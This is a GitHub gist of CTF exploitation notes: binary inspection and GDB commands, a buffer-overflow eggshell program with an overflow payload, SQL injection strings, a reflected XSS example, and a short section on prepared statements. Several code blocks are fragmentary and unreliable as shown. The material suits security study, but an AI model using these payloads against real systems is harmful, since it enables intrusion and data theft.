Skip to content

Instantly share code, notes, and snippets.

Last active May 20, 2022 11:51
  • Star 4 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Quick reference for CTF

Commands for exploiting software vulnerabilities

Dot-dot and directory traversal attacks

This is where noobs start. If you are not sure what this is, this guide might not make much sense to you.


ls -sf /tmp/target /tmp/link

Binary to ASM

Using objdump

objdump -S binary.out | less

ELF sections Pic - Adam Doupe

View strings in binary

Using strings

strings binary.out
objdump -s binary.out | less

Checking system calls

Man for ltrace and strace.

ltrace -f binary.out
strace -f binary.out

Debugging with GDB


r binary.out
b <line_number/memory_address>
c (continues)
attach (ongoing process)
set detach-on-fork off (attach to forked child)

Ensuring same address works in debug mode and runtime is extremely important. Use this utility to make sure that the environment and argument stack remains the same in both the modes.

  • Invocation:
$ binary.out         # just call the executable
$ -d binary.out      # run the executable in GDB
  • Utility (don't forget to chmod +x

while getopts "dte:h?" opt ; do
  case "$opt" in
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
    exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
  exec env - $env TERM=screen PWD=$PWD $prog "$@"

Ref - stackoverflow

Shell code for /bin/sh from shell-storm


Buffer overflow

Create a new shell code that injects your code ('/bin/sh') into a new env variable, and invokes the corresponding shell. (tutorial)

/* eggcode.c */
#include <unistd.h>
#define NOP 0x90
char shellcode[] =
int main(void)
  char shell[512];
  puts("Eggshell loaded into environment.\n");
  memset(shell,NOP,512);     /* fill-up the buffer with NOP */
/* fill-up the shellcode on the second half to the end of buffer */
  /* set the environment variable to */
  /* EGG and shell as its value, rewrite if needed */
  setenv("EGG", shell, 1);
  /* modify the variable */
  /* invoke the bash */
  return 0;

Gets address of the first instruction of the malacious code

/* findeggaddr.c */
#include <unistd.h>
int main(void)
  printf("EGG address: 0x%lx\n", getenv("EGG"));
  return 0;

Exploit using overflow buffer - calculate stack address and inject using python or perl script. Eg.

`python -c "print 'A'x516 + '\x73\xf5\xff\xbf'"`
`perl -e 'print "A"x516'``printf "\x73\xf5\xff\xbf"`

Please keep in mind

  • Endianess (inverse memory address)
  • checking env after injecting shell code
  • size of datatypes (char-1, int-4, float-8, double-16 etc.) when overflowing buffers
Declaration Allocation in memory
first lower mem address
last higher mem address

process structure Pic - Adam Doupe

SQL Injection cheat sheet

Checking for SQL injection:

  • Normal
' or 1=1 --
  • Blind returns same response for both if there is a user with user_name h4x0r
pressRelease.jsp?id=5 AND user_name()=‘h4x0r’
  • Second Order injection Set user to john-- and change actual john's password using:
update users set password=where username ='john'--'

Please ensure you see the cheat sheet for the correct technology. Here is the one for MySQL.

Making client side requests

curl -H 'header=value' <ip/hostname>:<port>
curl -b PHPSESSID=n7591kbbse8rug4dfn019skv05 -F oid=5929 -F price=2500 -F cur=usd
nc <destination> <port> < input.txt #sending data to stdin


  • Executable in /etc/xinetd.d
service <service_name>
        socket_type     = stream
        protocol        = tcp
        user            = <user_executing_this>
        wait            = no
        server          = /<path_to_binary>/<binary_with_x_permissions>
        log_type        = SYSLOG daemon debug
  • Add service to /etc/services
<service_name>       11000/tcp
  • Restart xinetd (we only need to do this if we change name of executable after patch)
sudo /etc/init.d/xinetd restart

Preventing vulnerabilites

Specify query structure and then provide parameters

$stmt = $db->prepare("select * from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1;"); 
$stmt->bindParam(':name', $name);
$stmt->bindParam(':pass', $pass);
  • Remote OS command execution - escapeshellcmd($str)
Copy link

sailik1991 commented May 2, 2016

At present add your updates to the comment section.

Please use markdown syntax
Use one comment per person. This will help us to give vulnerabilities depending on you speciality! :)

Copy link

ashuaeron commented May 2, 2016

XSS Attacks:

  • Reflected XSS attack


<?php $name = $_GET['name']; ?>
       <p> Hello <?= $name ?></p>

Attack can take place by requesting untrusted data. Like<script>alert('attack')</script>

sailik1991 - There are a thousand ways to evade checks and execute XSS
Here is a lost of all Filter Evasion techniques

Copy link

yugarsi commented May 2, 2016

this is useful

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment